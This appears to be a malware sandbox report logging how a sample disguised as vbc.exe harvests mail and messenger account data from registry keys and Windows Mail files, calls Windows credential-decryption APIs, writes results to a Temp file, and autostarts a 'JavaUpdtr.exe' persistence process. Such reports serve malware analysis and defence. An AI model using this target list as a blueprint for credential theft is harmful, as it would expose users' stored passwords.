C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt 475 bytes MD5: 0e8d54d411f43f166821d012d45b1199
SHA1: a102c887b7ee1e8f1e2555e30c1c58015248251b
SHA256: 72ee1a9d65acc2cf4fea9c11dbec1e6ee7b67fed882b5fd37d69c3692814b4df
SSDeep: 6:QAXqqq9UMe7PQDC+8ADAwzRIjMw1NAmYezRSJcnDWpSnDWAwb:QZ9UHr+8ADzRIRvGe9SJgyp6yAwb 		False
...
Host Behavior
File (32)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc_lng.ini type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Profiles type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Thunderbird\Profiles type = file_attributes False 1
Fn
Get Info C:\Program Files (x86)\Mozilla Thunderbird type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount type = size True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount type = size True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount type = size True 1
Fn
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount size = 1506, size_out = 1506 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount size = 670, size_out = 670 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount size = 1734, size_out = 1734 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 50 True 2
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 2 True 3
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 29 True 2
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 52 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 40 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 26 True 2
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 22 True 4
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 24 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 28 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt size = 27 True 1
Fn
Data
Registry (124)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Identities - True 1
Fn
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} - True 1
Fn
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\05cb6f136411cf4daf1f74e966b0a7dc - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4b62e5f8c092a64ea9b79fd559a5a15e - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\609a848a708f544697003a34105400ef - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\63cba20b08018a458b6edb5d87fb54da - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\828cd3a417cead4ab3a214070dce1c3d - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\88d17fec23cbdd4fb54ad1d34c0dce09 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a533ec91a4f74549ac2130b6908c8aac - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b70c659765f94740b657fee657d05ab4 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\cce6b8ce16bac4458e5e40e3530d6f1d - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dd7f40a823cda64b92e9a96e9e46e406 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\IncrediMail\Identities - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Group Mail - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\MessengerService - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Yahoo\Pager - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail - False 1
Fn
Read Value HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} value_name = Username, data = Main Identity, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 User, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Server, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = Display Name, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = Email, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Server, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Use SPA, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Password, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 value_name = POP3 User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = POP3 User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Identities - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Identities - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\05cb6f136411cf4daf1f74e966b0a7dc - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4b62e5f8c092a64ea9b79fd559a5a15e - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\609a848a708f544697003a34105400ef - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\63cba20b08018a458b6edb5d87fb54da - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\828cd3a417cead4ab3a214070dce1c3d - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\88d17fec23cbdd4fb54ad1d34c0dce09 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a533ec91a4f74549ac2130b6908c8aac - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b70c659765f94740b657fee657d05ab4 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\cce6b8ce16bac4458e5e40e3530d6f1d - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dd7f40a823cda64b92e9a96e9e46e406 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles - False 1
Fn
Module (32)
»
Operation Module Additional Information Success Count Logfile
Load comctl32.dll base_address = 0x73530000 True 1
Fn
Load shell32.dll base_address = 0x75fd0000 True 1
Fn
Load pstorec.dll base_address = 0x73520000 True 1
Fn
Load crypt32.dll base_address = 0x759b0000 True 2
Fn
Load advapi32.dll base_address = 0x74d40000 True 3
Fn
Get Handle c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe base_address = 0x400000 True 2
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, size = 260 True 2
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll function = InitCommonControlsEx, address_out = 0x73536be6 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathA, address_out = 0x7621fb26 True 1
Fn
Get Address c:\windows\syswow64\pstorec.dll function = PStoreCreateInstance, address_out = 0x7352526c True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptUnprotectData, address_out = 0x759e5a7f True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CredReadA, address_out = 0x74d871c1 True 3
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CredFree, address_out = 0x74d4b2ec True 3
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CredDeleteA, address_out = 0x74d87941 True 3
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CredEnumerateA, address_out = 0x74d87381 True 3
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CredEnumerateW, address_out = 0x74d87481 True 3
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 1
Fn
Get Info type = Operating System True 1
Fn
Ini (7)
»
Operation Filename Additional Information Success Count Logfile
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg section_name = General, key_name = AddExportHeaderLine, default_value = 0 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg section_name = General, key_name = WinPos False 1
Fn
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg section_name = General, key_name = Columns False 1
Fn
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg section_name = General, key_name = Sort, default_value = 0 True 1
Fn
Process #7: javaupdtr.exe
616 0
»
Information Value
ID #7
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:40, Reason: Autostart
Unmonitor End Time: 00:01:58, Reason: Self Terminated
Monitor Duration 00:00:18
OS Process Information
»
Information Value
PID 0x4e8
Parent PID 0x3a4 (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 4EC
0x 6DC
0x 6E4
0x 6F8
0x 6FC
0x 720
